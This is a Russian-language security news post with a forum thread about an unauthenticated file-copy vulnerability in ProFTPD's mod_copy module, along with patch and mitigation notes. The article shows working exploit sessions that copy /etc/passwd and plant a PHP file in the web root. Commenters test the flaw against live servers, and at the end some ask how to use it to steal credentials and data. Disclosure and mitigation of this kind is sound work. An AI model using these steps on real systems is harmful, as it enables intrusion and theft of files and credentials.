URL: https://www.opennet.me/cgi-bin/openforum/vsluhboard.cgi
Форум: vsluhforumID3
Нить номер: 102003
[ Назад ]

Исходное сообщение
"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификации"

Отправлено opennews , 10-Апр-15 09:25 
В ftp-сервере ProFTPD обнаружена (http://bugs.proftpd.org/show_bug.cgi?id=4169) опасная уязвимость, которая позволяет копировать файлы в пределах сервера без проведения аутентификации с помощью команд "site cpfr" и "site cpto". Проблема проявляется в модуле mod_copy, который позволяет выполнять команды на стадии до проведения аутентификации пользователя. Уязвимость усугубляется отсутствием возможности отключить mod_copy через файл конфигурации и наличием путей эксплуатации уязвимости, которые могут быть использованы в атаке для организации  выполнения кода на web-сервере.


В настоящий момент исправления доступны (https://github.com/proftpd/proftpd/pull/109) только в виде патча (https://github.com/proftpd/proftpd/commit/3ef395d81327558e6e...) в git-репозитории проекта. Одновременно для ProFTPD предложена реализация директивы CopyEngine, через которую можно отключить mod_copy без перекомпиляции. В настоящее время в дистрибутивах не зафиксировано обновлений пакетов с устранением проблемы. Оценить появление обновлений в дистрибутивах можно на следующих страницах: RHEL 6 (https://rhn.redhat.com/errata/rhel-server-6-errata.html), RHEL 7 (https://rhn.redhat.com/errata/rhel-server-7-errata.html), Ubuntu (http://www.ubuntu.com/usn/), Debian (https://lists.debian.org/debian-security-announce/2015/), Fedora (https://admin.fedoraproject.org/updates/F21), openSUSE (http://lists.opensuse.org/opensuse-security-announce/), SLES (https://www.suse.com/support/update/),  Slackware (http://www.slackware.com/security/list.php?l=slackware-secur...), Gentoo (http://www.gentoo.org/security/en/index.xml), CentOS (http://lists.centos.org/pipermail/centos-announce/2015-April...),  FreeBSD (http://www.vuxml.org/freebsd/).


Пример копирования файла /etc/passwd в /tmp/passwd.copy:

<font color="#461b7e">
   Trying 192.168.216.115...
   Connected to 192.168.216.115.
   Escape character is '^]'.
   220 ProFTPD 1.3.5rc3 Server (Debian) [::ffff:80.150.216.115]
   site cpfr /etc/passwd
   350 File or directory exists, ready for destination name
   site cpto /tmp/passwd.copy
   250 Copy successful
</font>

Пример организации запуска кода на web-сервере:

<font color="#461b7e">
   site cpfr /etc/passwd
   350 File or directory exists, ready for destination name
   site cpto <?php phpinfo(); ?>
   550 cpto: Permission denied
   site cpfr /proc/self/fd/3
   350 File or directory exists, ready for destination name
   site cpto /var/www/test.php
   250 Copy successful
</font>

Файл test.php будет содержать данные из потока STDERR, в том числе и указанный в ошибочной команде PHP-код:


<font color="#461b7e">
   2015-04-04 02:01:13,159 slon-P5Q proftpd[16255] slon-P5Q
(slon-P5Q.lan[192.168.3.193]): error rewinding scoreboard: Invalid argument
   2015-04-04 02:01:13,159 slon-P5Q proftpd[16255] slon-P5Q
(slon-P5Q.lan[192.168.3.193]): FTP session opened.
   2015-04-04 02:01:27,943 slon-P5Q proftpd[16255] slon-P5Q
(slon-P5Q.lan[192.168.3.193]): error opening destination file
'/<?php
phpinfo(); ?>'
for copying: Permission denied
</font>


URL: http://bugs.proftpd.org/show_bug.cgi?id=4169
Новость: http://www.opennet.me/opennews/art.shtml?num=42015


Содержание

Сообщения в этом обсуждении
"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено Аноним , 10-Апр-15 09:25 
Граждане, уберите ip сервера из статьи! :)

"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено adminlocalhost , 10-Апр-15 09:34 
какой ужс засветить локальный ип...

"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено Нанобот , 10-Апр-15 09:56 
> какой ужс засветить локальный ип...

там было 80.150.216.115, потом исправили


"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено Anonim , 10-Апр-15 10:06 
>> какой ужс засветить локальный ип...
>
> там было 80.150.216.115, потом исправили

Граждане, уберите ip сервера из комментария! :)


"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено adminlocalhost , 10-Апр-15 10:18 
его уже столько раз засветили...
и ниже даже проверяли на предмет пофикса

"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено Нанобот , 10-Апр-15 09:56 
о ужас! они опубликовали ip-адрес, зная его, хакиры смогут зверски расправиться с сервером!!111
З.Ы раз убрали адрес, тогда уже и ссылку на багрепорт тоже следует убрать, а то особо прокачаные истерички смогут сходить по ней и тоже обнаружить там ip-адрес!!!111
а лучше сразу весь ихний багтрекер в добавить реестр запрещённых сайтов, за склонение к совершению преступления

"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено Аноним , 10-Апр-15 09:33 
добавим, что данный мод появился в 1.3.4 - Slowpoke могут продолжать спать!

"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено Nas_tradamus , 10-Апр-15 18:40 
Сервак на убунте:

telnet ftp.site.ru 21
Trying 81.108.142.19...
Connected to ftp.site.ru.
Escape character is '^]'.
220 ProFTPD 1.3.4a Server (Site_RU) [81.108.142.19]
site cpfr /etc/passwd
500 'SITE CPFR' not understood
site cpto /tmp/passwd.copy
503-Bad sequence of commands
503 Bad sequence of commands

500 Invalid command: try being more creative


"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено бедный буратино , 10-Апр-15 09:34 
ftp и php - созданы друг для друга

"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено Аноним , 12-Апр-15 13:13 
> ftp и php - созданы друг для друга

Кто о чем, а буратино гремит бидоном :)


"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено luzerz , 10-Апр-15 09:41 
у них уже не работает(
Trying 80.150.216.115...
Connected to 80.150.216.115.
Escape character is '^]'.
220 ProFTPD 1.3.5rc3 Server (Debian) [::ffff:80.150.216.115]
site cpfr /etc/passwd
350 File or directory exists, ready for destination name
   site cpto /tmp/passwd.copy
500 Invalid command: try being more creative

"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено luzerz , 10-Апр-15 09:41 
хотя не
скопипастил криво
работает
site cpto /tmp/passwd.copy
250 Copy successful

"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено Аноним , 10-Апр-15 11:59 
фтп демон от рута работает штоль?
Зачем вообще выполнять команды до аунтификации?

"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено Nas_tradamus , 12-Апр-15 13:44 
В /tmp любой юзер может писать.

"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено adminlocalhost , 10-Апр-15 09:48 
в centos из коробки без него proftpd -V | grep -i copy
в сусе он shared - cd /usr/lib64/proftpd && mv mod_copy.so{,.0} && service proftpd restart

так что живем пока, жаль только что proftpd подтверждает свою дырявость...


"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено vlikhachev , 10-Апр-15 20:46 
> в centos из коробки без него proftpd -V | grep -i copy
> в сусе он shared - cd /usr/lib64/proftpd && mv mod_copy.so{,.0} && service
> proftpd restart
> так что живем пока, жаль только что proftpd подтверждает свою дырявость...

В CentOS оно не так
ftp> site cpfr /etc/passwd
500 'SITE CPFR' not understood
ftp> site copy from /etc/passwd
500 'SITE COPY' not understood
ftp> site help
214-The following SITE commands are recognized (* =>'s unimplemented)
HELP
CHGRP
CHMOD
214 Direct comments to root@localhost
ftp> quit
221 Goodbye.

Где Ваша дырявость находится - в Ubuntu, что ли?


"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено Аноним , 12-Апр-15 07:51 
читать сообщение, перед тем как что-то писать в ответ, не пробовал?

"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено Аноним , 10-Апр-15 09:59 
У меня Slackware-14.1. К сожалению (или счастью - не получилось ничего):
ftp> passive
Passive mode on.
ftp> dir
227 Entering Passive Mode (Hele is ftp ip address,217,234)
150 Opening ASCII mode data connection for file list
drwxr-xr-t   2 ftp      ftp          4096 Mar 10 06:58 incoming
drwxrwsr-x   7 root     wheel        4096 Jan 10 08:54 pub
-rw-r--r--   1 root     root          366 Oct 20  2009 welcome.msg
226 Transfer complete
ftp> site cpfr /etc/passwd
505 Security server forbids SITE commands. Contact admin.
ftp> quit
221 Goodbye.

"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено Аноним , 10-Апр-15 10:28 
С помощью telnet тоже не работает?

"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено Аноним , 10-Апр-15 10:43 
Да, тоже не работает:
230-Connected to server. Logging in...
230-220 ProFTPD 1.3.4a Server (ProFTPD Default Installation) [192.168.1.2]
230-331 Anonymous login ok, send your complete email address as your password
230-230-Welcome, archive user ftp@... !
230- You are 0 from ...
230-
230- The local time is: Fri Apr 10 10:39:52 2015
230-
230- This is an experimental FTP server.  If have any unusual problems,
230- please report them via e-mail to <root@mail>.
230-
230- If you do have problems, please try using a dash (-) as the first
230- character of your password -- this will turn off the continuation
230- messages that may be confusing your FTP client.
230-
230 230 Anonymous access granted, restrictions apply
pasv
227 Entering Passive Mode (ip here,210,0)
site cpfr /etc/passwd
505 Security server forbids SITE commands. Contact admin.
quit
221 Goodbye.

"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено ALex_hha , 10-Апр-15 11:17 
С какой задницы они выдрали этот модуль? Ведь по дефолту этого модуля нет.

http://www.proftpd.org/docs/modules/index.html
http://www.proftpd.org/docs/contrib/index.html

здесь тоже не нашел.


P.S.
> ftp и php - созданы друг для друга

Кому що, а бабцi - курки :)

Мы же поняли, что ты не любишь php. Можешь выдыхать.


"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено бедный буратино , 10-Апр-15 12:02 
> Кому що, а бабцi - курки :)
> Мы же поняли, что ты не любишь php. Можешь выдыхать.

увы, из песни ты не понял ничего...

а на php мне как-то фиолетово. речь идёт о конкретной культуре...


"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено Аноним , 10-Апр-15 20:11 
> речь идёт о конкретной культуре...

Из тебя культура так и прет. Конкретно.


"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено Омномним , 10-Апр-15 11:33 
Хорошо, что я на своей toy vps-ке поставил vsftpd.
(Ожидаю советов от достопочтенных анонимусов, почему я это сделал зря.)

"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено Анонимус сапиенс , 10-Апр-15 13:35 
Зачем тебе FTP? Роль FTP прекрасно заменяют python или lighttpd + SFTP.

"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено cmp , 10-Апр-15 14:58 
А SFTP не заменяет FTP?, на кой черт там питон

"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено Аноним , 10-Апр-15 20:12 
> Зачем тебе FTP? Роль FTP прекрасно заменяют python или lighttpd + SFTP.

А питон там нафуа? Можно какой-нибудь webdav использовать, наконец, если загрузка файлов нужна.


"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено Анонимус сапиенс , 21-Апр-15 22:40 
>> Зачем тебе FTP? Роль FTP прекрасно заменяют python или lighttpd + SFTP.
> А питон там нафуа? Можно какой-нибудь webdav использовать, наконец, если загрузка файлов
> нужна.

Анонимный FTP


"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено Аноним , 10-Апр-15 11:42 
А нефиг запихивать левые contrib-модули.
В нормальных дистрах его нет.

"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено Аноним , 10-Апр-15 11:53 
только vsftpd!

"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено Куяврег , 12-Апр-15 01:14 
штатный фряшный неплох

"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено Аноним , 10-Апр-15 12:02 
Лучше уж pureftpd.

"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено Аноним , 10-Апр-15 12:21 
Это чем позвольте поинтересоваться, лучше?

"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено Аноним , 10-Апр-15 14:27 
Более безопасный. Фич меньше.

"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено sage , 10-Апр-15 14:30 
чем proftpd.

"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено Аноним , 10-Апр-15 14:33 
Согласен. Pure-ftpd vs Vsftpd сравнить не могу, ибо последний не использовал.
По-моему, оба security-first designed.

"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено Аноним , 10-Апр-15 14:30 
> Это чем позвольте поинтересоваться, лучше?

http://www.cvedetails.com/product/16873/Proftpd-Proftpd.html...

http://www.cvedetails.com/vendor/2152/Pureftpd.html


"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено Nas_tradamus , 12-Апр-15 13:50 
> Лучше уж pureftpd.

Он довольно топорный и меньше фич в нем реализовано.
Pure не умеет несколько разных публичных ftp на разных ip, например. Это может понадобиться в хостинге.


"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено Аноним , 10-Апр-15 12:28 
Centos 5, 6, 7 не подвержены.
Debian 6 не подвержен.
Ubuntu 10.04 не подвержен.

Фикс для Ubuntu 14.04, Ubuntu 12.04, Debian 7

sed -i 's|LoadModule mod_copy.c|#LoadModule mod_copy.c|g' /etc/proftpd/modules.conf
service proftpd restart


"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено BadUID , 10-Апр-15 13:10 
вынес вперед тапками 2 модуля
mod_copy и mod_site_misc.
на FreeBSD в портах убираете в Makefile в модулях
mod_copy
в pkg-plist убираете mod_copy и mod_site_misc
сначала deinstall потом заново поставить. проверил - проблем нету

"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено Sw00p aka Jerom , 10-Апр-15 14:06 
а в режиме только mod_sftp проявляется бага ?

"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено Аноним , 12-Апр-15 08:06 
> вынес вперед тапками 2 модуля
> mod_copy и mod_site_misc.
> на FreeBSD в портах убираете в Makefile в модулях
> mod_copy
> в pkg-plist убираете mod_copy и mod_site_misc
> сначала deinstall потом заново поставить. проверил - проблем нету

так оно и так не подвержено, нахрена эти телодвижения? модуль собирается, но не вкомпилен и не подключен по умолчанию:

#  find /usr/local/ -name 'mod_cop*'
/usr/local/libexec/proftpd/mod_copy.a
/usr/local/libexec/proftpd/mod_copy.so

# proftpd -l
Compiled-in modules:
  mod_core.c
  mod_xfer.c
  mod_auth_unix.c
  mod_auth_file.c
  mod_auth.c
  mod_ls.c
  mod_log.c
  mod_site.c
  mod_delay.c
  mod_facts.c
  mod_dso.c
  mod_ident.c
  mod_auth_pam.c
  mod_ctrls.c
  mod_lang.c

Escape character is '^]'.
220 ProFTPD 1.3.4d Server (ProFTPD Default Installation) [***]
site cpfr /etc/passwd
500 'SITE CPFR' not understood
help
214-The following commands are recognized (* =>'s unimplemented):
CWD     XCWD    CDUP    XCUP    SMNT*   QUIT    PORT    PASV    
EPRT    EPSV    ALLO*   RNFR    RNTO    DELE    MDTM    RMD    
XRMD    MKD     XMKD    PWD     XPWD    SIZE    SYST    HELP    
NOOP    FEAT    OPTS    AUTH*   CCC*    CONF*   ENC*    MIC*    
PBSZ*   PROT*   TYPE    STRU    MODE    RETR    STOR    STOU    
APPE    REST    ABOR    USER    PASS    ACCT*   REIN*   LIST    
NLST    STAT    SITE    MLSD    MLST    
214 Direct comments to root@***
quit
221 Goodbye.
Connection closed by foreign host.


"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено Аноним , 10-Апр-15 14:52 
Кто-то ещё юзает это дырявое пoделие? Даже так, кто-то ещё юзает недoпротокол ftp как таковой?

"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено cmp , 10-Апр-15 15:27 
> Даже так, кто-то ещё юзает недoпротокол
> ftp как таковой?

Да, его поддерживают почти все l2 коммутаторы.

> Кто-то ещё юзает это дырявое пoделие?

В некоторых встраиваемых прошивках оно встроенно, sshfs тоже есть, но с шифрованием канала скорость просто атас.

А на серверах, да, эпик фейл, достаточно заголовки новостей про него почитать и сравнить с аналогичными о vsftpd, странно, что redhat это недоразумение не выпилил без возможности запилить))


"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено Аноним , 10-Апр-15 15:47 
> Да, его поддерживают почти все l2 коммутаторы.

с tftp не путай


"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено cmp , 11-Апр-15 07:25 
>> Да, его поддерживают почти все l2 коммутаторы.
> с tftp не путай

А я и не путаю))


"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено Аноним , 10-Апр-15 20:14 
> Да, его поддерживают почти все l2 коммутаторы.

А мой кЕтайский тетрис его не поддерживает.

> В некоторых встраиваемых прошивках оно встроенно,

Так там и файлы обычно не перекидывают гигазами.


"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено Аноним , 10-Апр-15 16:00 
> Кто-то ещё юзает это дырявое пoделие? Даже так, кто-то ещё юзает недoпротокол
> ftp как таковой?

протокол может и не идеальный, но единственный который 10гбит/с линк утилизирует нормально. все эти ваши модные эсфытыпы и хытытыпы даже половины этой скорости не выжимают.


"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено Demo , 10-Апр-15 20:23 
> протокол может и не идеальный, но единственный который 10гбит/с линк утилизирует
> нормально. все эти ваши модные эсфытыпы и хытытыпы даже половины этой скорости
> не выжимают.

Пробовал по FTP передавать файлы между серверами (оба подключены 10 Гбит/с) в Далласе и Амстердаме, видел жалкие 30—100 Мегабит/с, в зависимости от величины суточного пинга. А вот когда выкинул FTP и заюзал tsunami, то да — совсем другое дело.


"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено pony , 10-Апр-15 16:08 
у ftp очень плохи дела, когда надо передавать много мелких файлов

"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено _KUL , 10-Апр-15 16:38 
Решается разрешением многопоточности.
Дела у протокола плохи тем, что пароль в чистом виде по сети ходит при авторизации, вот это реально плохо ...

"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено Аноним , 10-Апр-15 19:14 
http://en.wikipedia.org/wiki/FTPS

"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено vlikhachev , 10-Апр-15 20:35 
> Решается разрешением многопоточности.
> Дела у протокола плохи тем, что пароль в чистом виде по сети
> ходит при авторизации, вот это реально плохо ...

Так сделайте же анонимный вход с доверенных IP адресов, и если они работают 24/7/365 (и к тому же ProFTPD от юзера nobody работает) - вполне себе безопасно...


"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено _KUL , 11-Апр-15 09:08 
Не выход - в одном броадкасте злодей может себе ип доверенный повесить и беда.

"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено Anonymous1 , 12-Апр-15 14:26 
Ну в одном broadcast-е злодей может и свой интерфейс в promiscque mode включить, либо в bridge к нему добавить dummy0 и все Ваши, даже шифрованные, пакеты кушать и (впоследствии) расшифровывать... Чуть дольше получится, но тем не менее...

Хотя несколько сомнительно - если, конечно, это белые V4 адреса приемника и получателя (обычно из существенно разных сетей), то трафик к другой сети пойдет через default GW, а не локально, либо нужно сломать саму машину с FTP и переписать на ней роутинг...  


"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено iZEN , 10-Апр-15 17:14 
Ну, сколько можно. Пользуйтесь, scp(1).

"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено Администратор Сетей , 10-Апр-15 19:03 
ФТП очень даже нормальный средство передатчи файлив, только вы неумеете им пользоватся!
ProFTPd исользую на сотнях карпораттивних серверах и за 10 лет неперывной эксплоутациы небыло замечено негативных моментов использования данного професианального ПО.

А истирить в камментах будут всегда, нато они и троли-истиричи...


"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено Аноним , 10-Апр-15 20:09 
FTP отличный протокол. Только файрвол задолбаешься настраивать и работать будет с костылями, черти-как.

"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено vlikhachev , 10-Апр-15 20:41 
> FTP отличный протокол. Только файрвол задолбаешься настраивать и работать будет с костылями,
> черти-как.

ЭЭЭ... Пардон, мы ведь про iptables сейчас говорим, или у Вас BSD?


"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено Аноним , 12-Апр-15 13:09 
> ЭЭЭ... Пардон, мы ведь про iptables сейчас говорим, или у Вас BSD?

Мы говорим про то что этот супер-протокол или требует весьма неординарных костылей (кастомный модуль connection tracking) или имеет уйму проблем. С прокси там тоже все своеобразно.

Да и времени на установку ДВУХ соединений уходит немало. По поводу чего например заливка кучи мелочи на фтп - "обосpaтьсяужаснaх!"



"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено Nas_tradamus , 12-Апр-15 13:58 
>> FTP отличный протокол. Только файрвол задолбаешься настраивать и работать будет с костылями,
>> черти-как.
> ЭЭЭ... Пардон, мы ведь про iptables сейчас говорим, или у Вас BSD?

В BSD как раз и не надо ничего предпринимать, если у вас FTP за натом: pf и ipfw сами его стейты разруливают "из коробки".
В случае iptables нужно лишь подгрузить conntrack-helper в ядро.

Не rocket sience же.


"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено Куяврег , 12-Апр-15 01:17 
твоя учительница русского поседела только что


"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено Капитан , 10-Апр-15 19:45 
Всегда использую PureFTPd отличный сервер для FTP безопасный/функциональный.

"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено Аноним , 11-Апр-15 01:53 
У ProFTPD такой здоровенная история уязвимостьей, что им пользуются только камикадзы.

"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено ALex_hha , 12-Апр-15 12:44 
> У ProFTPD такой здоровенная история уязвимостьей, что им пользуются только камикадзы.

когда нужен широкий функционал, то выбора особо то и нет. Так что приходится платить


"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено а , 13-Апр-15 12:05 
Точно, ещё несколько лет назад увидев в новостях несколько раз подряд сообщения об уязвимостях в ProFTP перешёл на vsftpd.

"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено Alex , 11-Апр-15 07:47 
Какая прелесть...

Блин, счастье, что никогда не рассматривал эту студенческую поделку ака ProFTPD всерьёз. Только vsftpd, только хардкор.


"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено ALex_hha , 12-Апр-15 12:43 
> Какая прелесть...
> Блин, счастье, что никогда не рассматривал эту студенческую поделку ака ProFTPD всерьёз.
> Только vsftpd, только хардкор.

потому что у vsftpd функционала - кот наплакал, поэтому и уязвимостей находя намного меньше.


"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено AlexAT , 14-Апр-15 21:22 
Простите, но древнющему говну мамонта а-ля FTP весь этот "функционал" совершенно без надобности. Основное его назначение - дать клиенту, не умеющему ничего другого, спокойно закопировать туда-сюда пару файлов. Для себя же (внутри) проще юзать scp, sftp (не путать с FTPoTLS), rsync и прочее.

"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено Nas_tradamus , 14-Апр-15 23:08 
> Простите, но древнющему говну мамонта а-ля FTP весь этот "функционал" совершенно без
> надобности. Основное его назначение - дать клиенту, не умеющему ничего другого,
> спокойно закопировать туда-сюда пару файлов. Для себя же (внутри) проще юзать
> scp, sftp (не путать с FTPoTLS), rsync и прочее.

Раз вам не надо - значит и другим не надо. Ясно.

а про scp пацаны-то и не знали...


"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено AlexAT , 14-Апр-15 23:24 
> Раз вам не надо - значит и другим не надо. Ясно.

Ну надо - хорошо. Поломали в очередной раз - тоже хорошо. Dixi.


"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено ALex_hha , 15-Апр-15 10:45 
> Простите, но древнющему говну мамонта а-ля FTP весь этот "функционал" совершенно без
> надобности. Основное его назначение - дать клиенту, не умеющему ничего другого,
> спокойно закопировать туда-сюда пару файлов. Для себя же (внутри) проще юзать
> scp, sftp (не путать с FTPoTLS), rsync и прочее.

если вам нужен только ftp, то безусловно, proftpd вам точно не нужен, а хватит vsftpd. Если же вам нужно что то больше, чем банальный ftp, то тут и начинаются проблемы.


"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено AlexAT , 15-Апр-15 19:34 
> Если же вам нужно что то больше, чем банальный ftp

то лучше FTP вообще не использовать ни под каким соусом.



"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено Nas_tradamus , 15-Апр-15 19:39 
>> Если же вам нужно что то больше, чем банальный ftp
> то лучше FTP вообще не использовать ни под каким соусом.

А как обмениваться многогигабайтными файлами между кучей поставщиков/партнёров/клиентов маленькой фирме?


"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено AlexAT , 15-Апр-15 19:45 
А теперь найдите в своей фразе взаимоисключающие вещи.


"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено Nas_tradamus , 12-Апр-15 14:01 
> Какая прелесть...
> Блин, счастье, что никогда не рассматривал эту студенческую поделку ака ProFTPD всерьёз.
> Только vsftpd, только хардкор.

Сравните объем кода и функционала у этих двух программ.
Вы только что сделали сравнение вида "postgres vs sqlite", обозвав первый студенческой поделкой.


"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено Аноним , 11-Апр-15 14:34 
На Ubuntu комментируем в /etc/proftpd/modules.conf строку LoadModule mod_copy.c, рестартим proftpd - PROFIT! "500 SITE CPFR" not understood. И кто сказал, что модуль нельзя выключить? Проверено на версии 1.3.5rc3

"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено Аноним , 12-Апр-15 09:49 
Подскажите, почему при тестирование некоторых серверов с одинаковыми версиями ProFTPD, есть возможность выполнять команды "site cpfr" и "site cpto", а в некоторых их нету. Хотя вроде версии ProFTPD одинаковые.

Это зависит от ОС?


"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено ALex_hha , 12-Апр-15 12:41 
> Это зависит от ОС?

скорее уж от опций сборки


"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено Аноним , 12-Апр-15 14:52 
Debian Squeeze: ProFTPD версии 1.3.3a, mod_copy там ещё нет.

Debian Wheezy: ProFTPD версии 1.3.4a, mod_copy отключается в /etc/proftpd/modules.conf.


"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено Аноним , 13-Апр-15 19:41 
Проверил на Debiane, да в папку tmp копирует,
НО при копирование в /var/www/ выдает Access denied
:/
Не знаю, как они там скопировали test.php... (

"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено Nas_tradamus , 13-Апр-15 19:43 
> Проверил на Debiane, да в папку tmp копирует,
> НО при копирование в /var/www/ выдает Access denied
> :/
> Не знаю, как они там скопировали test.php... (

В /tmp может писать любой юзер, потому что. А копирование идёт от юзера, от которого запущено приложение.


"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено Аноним , 13-Апр-15 20:06 
>> Проверил на Debiane, да в папку tmp копирует,
>> НО при копирование в /var/www/ выдает Access denied
>> :/
>> Не знаю, как они там скопировали test.php... (
> В /tmp может писать любой юзер, потому что. А копирование идёт от
> юзера, от которого запущено приложение.

Тогда какие ещё есть мысли на этот счет? Что можно сделать? Используя данную уязвимость, были мысли прописать в крон что-нибудь, но ведь там тоже Access Denied


"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено Аноним , 14-Апр-15 12:37 
>>> Проверил на Debiane, да в папку tmp копирует,
>>> НО при копирование в /var/www/ выдает Access denied
>>> :/
>>> Не знаю, как они там скопировали test.php... (
>> В /tmp может писать любой юзер, потому что. А копирование идёт от
>> юзера, от которого запущено приложение.
> Тогда какие ещё есть мысли на этот счет? Что можно сделать? Используя
> данную уязвимость, были мысли прописать в крон что-нибудь, но ведь там
> тоже Access Denied

ну, например, спереть что душе угодно, от сертефикатов, до баз с кредитками и файликов с хешами паролей...


"Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."
Отправлено Аноним , 14-Апр-15 13:27 
>[оверквотинг удален]
>>>> НО при копирование в /var/www/ выдает Access denied
>>>> :/
>>>> Не знаю, как они там скопировали test.php... (
>>> В /tmp может писать любой юзер, потому что. А копирование идёт от
>>> юзера, от которого запущено приложение.
>> Тогда какие ещё есть мысли на этот счет? Что можно сделать? Используя
>> данную уязвимость, были мысли прописать в крон что-нибудь, но ведь там
>> тоже Access Denied
> ну, например, спереть что душе угодно, от сертефикатов, до баз с кредитками
> и файликов с хешами паролей...

Интересно было бы увидить пример, допустим мы можем копировать файлы, в папку tmp, но как с неё считать их? В